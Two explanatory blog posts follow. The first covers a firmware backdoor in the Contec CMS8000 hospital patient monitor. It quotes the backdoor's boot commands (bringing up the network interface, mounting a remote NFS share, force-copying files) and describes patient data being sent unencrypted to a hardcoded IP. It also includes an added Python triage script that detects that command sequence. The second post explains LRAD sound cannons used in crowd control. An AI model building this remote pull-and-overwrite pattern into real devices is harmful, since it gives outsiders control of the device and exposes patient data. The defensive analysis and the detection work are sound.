Tech Explained: Firmware Backdoors

Last month I came across a document released by the US cyber defence agency and never really got time to look into it in detail. I think this deserves more attention. It details that a patient monitor, the Contec CMS8000, used in many hospitals to track vitals like heart rate and oxygen levels, contains a firmware backdoor.

This backdoor is hardcoded into the device. When it powers on, it quietly tries to connect to a specific IP address owned not by Contec but by a university in China. Once connected, it mounts a remote file system and copies files into critical system directories, overwriting whatever is already there. There’s no integrity check, no version tracking, and no logging. The device just accepts and runs whatever it gets.

Technically, this is done using standard Linux commands like “ifconfig eth0 up” to enable the network, then “mount -t nfs” to reach the remote server, followed by “cp -rf” to replace files. These commands essentially hand over control of the device to whoever controls that IP. Even worse, patient data like ECG, SpO2, and blood pressure is transmitted to that same IP address over port 515 (normally used for old printer systems), not even using proper medical protocols. There’s no encryption, no authentication, just raw patient data streamed out. Meaning, if a remote handler wants, they can get your full data without any fuss. With the backdoor, they can also just show any random readings/waveforms on screen. To me, this isn’t just a firmware bug. It’s a really badly coded feature or, more likely, a backdoor for future remote access.
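A firmware-triage check for the startup sequence described above, added here as an example (it is not code from the advisory or from the vendor): it pulls printable strings out of a firmware image and flags the interface-up, NFS-mount and forced-copy commands occurring together, along with any IPv4 literal on those lines. The regexes, function names, sample bytes, paths and the 192.0.2.10 documentation-range address are assumptions constructed for illustration.

```python
import ipaddress
import re

# Commands quoted in the post; the regexes are this example's own assumption.
PATTERNS = {
    "iface_up": re.compile(r"\bifconfig\s+\S+\s+up\b"),
    "nfs_mount": re.compile(r"\bmount\s+-t\s+nfs\b"),
    "forced_copy": re.compile(r"\bcp\s+-rf\b"),
}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_strings(blob: bytes, min_len: int = 6):
    """Yield printable ASCII runs, like the `strings` utility."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        yield m.group().decode("ascii")


def triage(blob: bytes) -> dict:
    """Report which patterns occur and IPv4 literals hardcoded on those lines."""
    hits = {name: [] for name in PATTERNS}
    addrs = set()
    for s in extract_strings(blob):
        for name, rx in PATTERNS.items():
            if rx.search(s):
                hits[name].append(s)
                for cand in IPV4.findall(s):
                    try:
                        addrs.add(str(ipaddress.ip_address(cand)))
                    except ValueError:
                        pass  # digits that look like an IP but are not one
    # All three together is the boot-time pull-and-overwrite sequence.
    return {"hits": hits, "hardcoded_ips": sorted(addrs),
            "suspicious": all(hits.values())}


# Constructed samples: fake firmware bytes, placeholder IP and made-up paths.
SAMPLE = (b"\x7fELF\x00\x01\x02" + b"ifconfig eth0 up\x00"
          + b"\xff\xfe" + b"mount -t nfs 192.0.2.10:/export /mnt\x00"
          + b"\x00\x03" + b"cp -rf /mnt/* /opt/bin\x00" + b"\x90" * 8)
CLEAN = b"\x7fELF\x00ifconfig eth0 up\x00\x01\x02mount -t vfat /dev/sda1 /mnt\x00"

if __name__ == "__main__":
    print(triage(SAMPLE))
    print(triage(CLEAN)["suspicious"])
```

A hit means the image deserves manual review; each command is common on its own in embedded Linux, which is why the check requires all three.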

BTW this is a white label device sold even in India under different resellers and brand names. Search for similar images on Indiamart or similar, you will get them. I don’t think anyone in India cares where their data ends up. Not sure why there isn’t any media outcry against this locally.

Anyway, if anyone from any hospital IT team is reading this and has this device (or any from its family), please remove network connectivity of this device. In an age where we trust machines with lives, we need to ask: who controls the code inside the box?


Tech Explained: LRAD & Sound Cannons

Over the last few months, some of you might have heard about the massive anti-corruption protests happening in Serbia. This week, you may have seen some videos shared online of protestors being magically moved away from roads via an invisible force. I was fascinated by what was happening and wanted to try to explain what it was and how it works.

LRAD in use against protestors

The system used there was most likely an LRAD (Long Range Acoustic Device), but this is just an educated guess on my part, not confirmed yet. It’s a non‑lethal tool originally designed for maritime communication, to carry verbal messages over long distances, and it has now been adapted for crowd control. At its core, the LRAD is essentially a high‑powered, directional loudspeaker. Instead of dispersing sound in all directions like your typical speaker, its array of piezoelectric transducers and acoustic horn concentrates sound into a narrow beam. This can emit sound levels that exceed 140-150 dB at close range. That’s like standing right next to a rocket taking off. Your eardrums can go toast. This noise can cause immediate discomfort and disorientation, and force people to step back involuntarily.

LRAD

In some LRAD systems, they use a chirp feature. Meaning, input to the speaker is a varying frequency. When multiple speakers emit sound at a single, fixed frequency, their sound waves overlap and create dead zones due to destructive interference. Chirp prevents the formation of persistent dead zones, ensuring the sound pressure remains uniformly strong and effective across the target area.

In the videos though, I don’t hear any massive sounds, so they might also be using a variant device called a sound vortex cannon. Think of this like a shockwave from a jet engine as a single pulse. It can be higher frequency. This can exert physical pressure, literally pushing people backward. Check demo videos online.

It’s wild seeing military tech adapted for civilian use. LRAD has a sister tech called Long Range Area Denial, using microwaves. That’s some next level scary weapon. If there is interest, I will write about it in future.

Video Source: Internet
